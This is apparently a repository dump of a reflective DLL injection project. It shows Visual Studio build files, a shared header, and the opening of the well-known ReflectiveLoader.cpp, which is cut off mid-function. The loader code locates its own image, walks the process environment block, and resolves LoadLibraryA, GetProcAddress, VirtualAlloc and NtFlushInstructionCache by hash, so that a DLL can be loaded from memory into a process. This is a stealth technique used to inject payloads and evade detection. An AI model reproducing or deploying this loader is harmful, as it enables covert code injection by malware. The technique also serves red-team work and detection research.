 59 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 60 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 61 |     <PlatformToolset>v142</PlatformToolset>
 62 |     <CharacterSet>Unicode</CharacterSet>
 63 |     <WholeProgramOptimization>false</WholeProgramOptimization>
 64 |     <VCToolsVersion>
 65 |     </VCToolsVersion>
 66 |     <UseOfMfc>false</UseOfMfc>
 67 |   </PropertyGroup>
 68 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 69 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 70 |     <PlatformToolset>v142</PlatformToolset>
 71 |     <CharacterSet>Unicode</CharacterSet>
 72 |   </PropertyGroup>
 73 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 74 |   <ImportGroup Label="ExtensionSettings">
 75 |   </ImportGroup>
 76 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
 77 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 78 |   </ImportGroup>
 79 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
 80 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 81 |   </ImportGroup>
 82 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
 83 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 84 |   </ImportGroup>
 85 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
 86 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 87 |   </ImportGroup>
 88 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 89 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 90 |   </ImportGroup>
 91 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 92 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 93 |   </ImportGroup>
 94 |   <PropertyGroup Label="UserMacros" />
 95 |   <PropertyGroup>
 96 |     <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
 97 |   </PropertyGroup>
 98 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 99 |     <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
100 |     <IntDir>$(Configuration)\</IntDir>
101 |     <LinkIncremental>true</LinkIncremental>
102 |   </PropertyGroup>
103 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
104 |     <LinkIncremental>true</LinkIncremental>
105 |   </PropertyGroup>
106 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
107 |     <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
108 |     <IntDir>$(Platform)\$(Configuration)\</IntDir>
109 |     <LinkIncremental>true</LinkIncremental>
110 |   </PropertyGroup>
111 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
112 |     <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
113 |     <IntDir>$(Configuration)\</IntDir>
114 |     <LinkIncremental>false</LinkIncremental>
115 |   </PropertyGroup>
116 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
117 |     <LinkIncremental>false</LinkIncremental>
118 |   </PropertyGroup>
119 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
120 |     <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
121 |     <IntDir>$(Platform)\$(Configuration)\</IntDir>
122 |     <LinkIncremental>false</LinkIncremental>
123 |   </PropertyGroup>
124 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
125 |     <ClCompile>
126 |       <Optimization>Disabled</Optimization>
127 |       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
128 |       <MinimalRebuild>true</MinimalRebuild>
129 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
130 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
131 |       <PrecompiledHeader />
132 |       <WarningLevel>Level3</WarningLevel>
133 |       <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
134 |     </ClCompile>
135 |     <Link>
136 |       <GenerateDebugInformation>true</GenerateDebugInformation>
137 |       <SubSystem>Windows</SubSystem>
138 |       <TargetMachine>MachineX86</TargetMachine>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
142 |     <ClCompile>
143 |       <Optimization>Disabled</Optimization>
144 |       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
145 |       <MinimalRebuild>true</MinimalRebuild>
146 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
147 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
148 |       <PrecompiledHeader>
149 |       </PrecompiledHeader>
150 |       <WarningLevel>Level3</WarningLevel>
151 |       <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
152 |     </ClCompile>
153 |     <Link>
154 |       <GenerateDebugInformation>true</GenerateDebugInformation>
155 |       <SubSystem>Windows</SubSystem>
156 |     </Link>
157 |   </ItemDefinitionGroup>
158 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
159 |     <Midl>
160 |       <TargetEnvironment>X64</TargetEnvironment>
161 |     </Midl>
162 |     <ClCompile>
163 |       <Optimization>Disabled</Optimization>
164 |       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
165 |       <MinimalRebuild>true</MinimalRebuild>
166 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
167 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
168 |       <PrecompiledHeader />
169 |       <WarningLevel>Level3</WarningLevel>
170 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
171 |     </ClCompile>
172 |     <Link>
173 |       <GenerateDebugInformation>true</GenerateDebugInformation>
174 |       <SubSystem>Windows</SubSystem>
175 |       <TargetMachine>MachineX64</TargetMachine>
176 |     </Link>
177 |   </ItemDefinitionGroup>
178 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
179 |     <ClCompile>
180 |       <Optimization>MaxSpeed</Optimization>
181 |       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
182 |       <IntrinsicFunctions>true</IntrinsicFunctions>
183 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
184 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
185 |       <FunctionLevelLinking>true</FunctionLevelLinking>
186 |       <PrecompiledHeader />
187 |       <WarningLevel>Level3</WarningLevel>
188 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
189 |     </ClCompile>
190 |     <Link>
191 |       <GenerateDebugInformation>true</GenerateDebugInformation>
192 |       <SubSystem>Windows</SubSystem>
193 |       <OptimizeReferences>true</OptimizeReferences>
194 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
195 |       <TargetMachine>MachineX86</TargetMachine>
196 |     </Link>
197 |     <PostBuildEvent>
198 |       <Command>
199 |       </Command>
200 |     </PostBuildEvent>
201 |   </ItemDefinitionGroup>
202 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
203 |     <ClCompile>
204 |       <Optimization>MinSpace</Optimization>
205 |       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
206 |       <IntrinsicFunctions>true</IntrinsicFunctions>
207 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
208 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
209 |       <FunctionLevelLinking>true</FunctionLevelLinking>
210 |       <PrecompiledHeader>
211 |       </PrecompiledHeader>
212 |       <WarningLevel>Level3</WarningLevel>
213 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
214 |       <BufferSecurityCheck>true</BufferSecurityCheck>
215 |       <CompileAs>Default</CompileAs>
216 |     </ClCompile>
217 |     <Link>
218 |       <GenerateDebugInformation>true</GenerateDebugInformation>
219 |       <SubSystem>Windows</SubSystem>
220 |       <OptimizeReferences>true</OptimizeReferences>
221 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
222 |       <OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
223 |     </Link>
224 |     <PostBuildEvent>
225 |       <Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
226 |     </PostBuildEvent>
227 |   </ItemDefinitionGroup>
228 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
229 |     <Midl>
230 |       <TargetEnvironment>X64</TargetEnvironment>
231 |     </Midl>
232 |     <ClCompile>
233 |       <Optimization>MaxSpeed</Optimization>
234 |       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
235 |       <IntrinsicFunctions>true</IntrinsicFunctions>
236 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
237 |       <WholeProgramOptimization>false</WholeProgramOptimization>
238 |       <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
239 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
240 |       <FunctionLevelLinking>true</FunctionLevelLinking>
241 |       <PrecompiledHeader />
242 |       <WarningLevel>Level3</WarningLevel>
243 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
244 |       <CompileAs>CompileAsCpp</CompileAs>
245 |     </ClCompile>
246 |     <Link>
247 |       <OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
248 |       <GenerateDebugInformation>true</GenerateDebugInformation>
249 |       <SubSystem>Windows</SubSystem>
250 |       <OptimizeReferences>true</OptimizeReferences>
251 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
252 |       <TargetMachine>MachineX64</TargetMachine>
253 |     </Link>
254 |     <PostBuildEvent>
255 |       <Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
256 |     </PostBuildEvent>
257 |   </ItemDefinitionGroup>
258 |   <ItemGroup>
259 |     <ClCompile Include="src\ReflectiveDll.cpp" />
260 |     <ClCompile Include="src\ReflectiveLoader.cpp" />
261 |   </ItemGroup>
262 |   <ItemGroup>
263 |     <ClInclude Include="src\ReflectiveDLLInjection.h" />
264 |     <ClInclude Include="src\ReflectiveLoader.h" />
265 |   </ItemGroup>
266 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
267 |   <ImportGroup Label="ExtensionTargets">
268 |   </ImportGroup>
269 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/reflective_dll.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |   </ItemGroup>
13 |   <ItemGroup>
14 |     <ClCompile Include="src\ReflectiveLoader.cpp">
15 |       <Filter>Source Files</Filter>
16 |     </ClCompile>
17 |     <ClCompile Include="src\ReflectiveDll.cpp">
18 |       <Filter>Source Files</Filter>
19 |     </ClCompile>
20 |   </ItemGroup>
21 |   <ItemGroup>
22 |     <ClInclude Include="src\ReflectiveDLLInjection.h">
23 |       <Filter>Header Files</Filter>
24 |     </ClInclude>
25 |     <ClInclude Include="src\ReflectiveLoader.h">
26 |       <Filter>Header Files</Filter>
27 |     </ClInclude>
28 |   </ItemGroup>
29 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/reflective_dll.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/src/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
 1 | //===============================================================================================//
 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 3 | // All rights reserved.
 4 | // 
 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
 6 | // provided that the following conditions are met:
 7 | // 
 8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
 9 | // conditions and the following disclaimer.
10 | // 
11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
13 | // with the distribution.
14 | // 
15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | // 
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include <windows.h>
33 | 
34 | // we declare some common stuff in here...
35 | 
36 | #define DLL_QUERY_HMODULE		6
37 | 
38 | #define DEREF( name )*(UINT_PTR *)(name)
39 | #define DEREF_64( name )*(DWORD64 *)(name)
40 | #define DEREF_32( name )*(DWORD *)(name)
41 | #define DEREF_16( name )*(WORD *)(name)
42 | #define DEREF_8( name )*(BYTE *)(name)
43 | 
44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );
45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
46 | 
47 | #define DLLEXPORT   __declspec( dllexport ) 
48 | 
49 | //===============================================================================================//
50 | #endif
51 | //===============================================================================================//
52 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/src/ReflectiveDll.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/dll/src/ReflectiveDll.cpp


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/dll/src/ReflectiveLoader.cpp:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
  3 | // All rights reserved.
  4 | // 
  5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
  6 | // provided that the following conditions are met:
  7 | // 
  8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
  9 | // conditions and the following disclaimer.
 10 | // 
 11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
 13 | // with the distribution.
 14 | // 
 15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
 16 | // endorse or promote products derived from this software without specific prior written permission.
 17 | // 
 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
 26 | // POSSIBILITY OF SUCH DAMAGE.
 27 | //===============================================================================================//
 28 | #include "ReflectiveLoader.h"
 29 | //===============================================================================================//
 30 | // Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
 31 | HINSTANCE hAppInstance = NULL;
 32 | //===============================================================================================//
 33 | #pragma intrinsic( _ReturnAddress )
 34 | // This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
 35 | // this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
 36 | // RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
 37 | // available (and no inline asm available under x64).
 38 | __declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
 39 | //===============================================================================================//
 40 | 
 41 | // Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
 42 | //         otherwise the DllMain at the end of this file will be used.
 43 | 
 44 | // Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
 45 | //         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
 46 | 
 47 | // This is our position independent reflective DLL loader/injector
 48 | #ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 49 | DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
 50 | #else
 51 | DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
 52 | #endif
 53 | {
 54 | 	// the functions we need
 55 | 	LOADLIBRARYA pLoadLibraryA     = NULL;
 56 | 	GETPROCADDRESS pGetProcAddress = NULL;
 57 | 	VIRTUALALLOC pVirtualAlloc     = NULL;
 58 | 	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
 59 | 
 60 | 	USHORT usCounter;
 61 | 
 62 | 	// the initial location of this image in memory
 63 | 	ULONG_PTR uiLibraryAddress;
 64 | 	// the kernels base address and later this images newly loaded base address
 65 | 	ULONG_PTR uiBaseAddress;
 66 | 
 67 | 	// variables for processing the kernels export table
 68 | 	ULONG_PTR uiAddressArray;
 69 | 	ULONG_PTR uiNameArray;
 70 | 	ULONG_PTR uiExportDir;
 71 | 	ULONG_PTR uiNameOrdinals;
 72 | 	DWORD dwHashValue;
 73 | 
 74 | 	// variables for loading this image
 75 | 	ULONG_PTR uiHeaderValue;
 76 | 	ULONG_PTR uiValueA;
 77 | 	ULONG_PTR uiValueB;
 78 | 	ULONG_PTR uiValueC;
 79 | 	ULONG_PTR uiValueD;
 80 | 	ULONG_PTR uiValueE;
 81 | 
 82 | 	// STEP 0: calculate our images current base address
 83 | 
 84 | 	// we will start searching backwards from our callers return address.
 85 | 	uiLibraryAddress = caller();
 86 | 
 87 | 	// loop through memory backwards searching for our images base address
 88 | 	// we dont need SEH style search as we shouldnt generate any access violations with this
 89 | 	while( TRUE )
 90 | 	{
 91 | 		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
 92 | 		{
 93 | 			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
 94 | 			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
 95 | 			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
 96 | 			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
 97 | 			{
 98 | 				uiHeaderValue += uiLibraryAddress;
 99 | 				// break if we have found a valid MZ/PE header
100 | 				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
101 | 					break;
102 | 			}
103 | 		}
104 | 		uiLibraryAddress--;
105 | 	}
106 | 
107 | 	// STEP 1: process the kernels exports for the functions our loader needs...
108 | 
109 | 	// get the Process Enviroment Block
110 | #ifdef WIN_X64
111 | 	uiBaseAddress = __readgsqword( 0x60 );
112 | #else
113 | #ifdef WIN_X86
114 | 	uiBaseAddress = __readfsdword( 0x30 );
115 | #else WIN_ARM
116 | 	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
117 | #endif
118 | #endif
119 | 
120 | 	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
121 | 	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
122 | 
123 | 	// get the first entry of the InMemoryOrder module list
124 | 	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
125 | 	while( uiValueA )
126 | 	{
127 | 		// get pointer to current modules name (unicode string)
128 | 		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
129 | 		// set bCounter to the length for the loop
130 | 		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
131 | 		// clear uiValueC which will store the hash of the module name
132 | 		uiValueC = 0;
133 | 
134 | 		// compute the hash of the module name...
135 | 		do
136 | 		{
137 | 			uiValueC = ror( (DWORD)uiValueC );
138 | 			// normalize to uppercase if the madule name is in lowercase
139 | 			if( *((BYTE *)uiValueB) >= 'a' )
140 | 				uiValueC += *((BYTE *)uiValueB) - 0x20;
141 | 			else
142 | 				uiValueC += *((BYTE *)uiValueB);
143 | 			uiValueB++;
144 | 		} while( --usCounter );
145 | 
146 | 		// compare the hash with that of kernel32.dll
147 | 		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
148 | 		{
149 | 			// get this modules base address
150 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
151 | 
152 | 			// get the VA of the modules NT Header
153 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
154 | 
155 | 			// uiNameArray = the address of the modules export directory entry
156 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
157 | 
158 | 			// get the VA of the export directory
159 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
160 | 
161 | 			// get the VA for the array of name pointers
162 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
163 | 			
164 | 			// get the VA for the array of name ordinals
165 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
166 | 
167 | 			usCounter = 3;
168 | 
169 | 			// loop while we still have imports to find
170 | 			while( usCounter > 0 )
171 | 			{
172 | 				// compute the hash values for this function name
173 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
174 | 				
175 | 				// if we have found a function we want we get its virtual address
176 | 				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
177 | 				{
178 | 					// get the VA for the array of addresses
179 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
180 | 
181 | 					// use this functions name ordinal as an index into the array of name pointers
182 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
183 | 
184 | 					// store this functions VA
185 | 					if( dwHashValue == LOADLIBRARYA_HASH )
186 | 						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
187 | 					else if( dwHashValue == GETPROCADDRESS_HASH )
188 | 						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
189 | 					else if( dwHashValue == VIRTUALALLOC_HASH )
190 | 						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
191 | 			
192 | 					// decrement our counter
193 | 					usCounter--;
194 | 				}
195 | 
196 | 				// get the next exported function name
197 | 				uiNameArray += sizeof(DWORD);
198 | 
199 | 				// get the next exported function name ordinal
200 | 				uiNameOrdinals += sizeof(WORD);
201 | 			}
202 | 		}
203 | 		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
204 | 		{
205 | 			// get this modules base address
206 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
207 | 
208 | 			// get the VA of the modules NT Header
209 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
210 | 
211 | 			// uiNameArray = the address of the modules export directory entry
212 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
213 | 
214 | 			// get the VA of the export directory
215 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
216 | 
217 | 			// get the VA for the array of name pointers
218 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
219 | 			
220 | 			// get the VA for the array of name ordinals
221 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
222 | 
223 | 			usCounter = 1;
224 | 
225 | 			// loop while we still have imports to find
226 | 			while( usCounter > 0 )
227 | 			{
228 | 				// compute the hash values for this function name
229 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
230 | 				
231 | 				// if we have found a function we want we get its virtual address
232 | 				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
233 | 				{
234 | 					// get the VA for the array of addresses
235 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
236 | 
237 | 					// use this functions name ordinal as an index into the array of name pointers
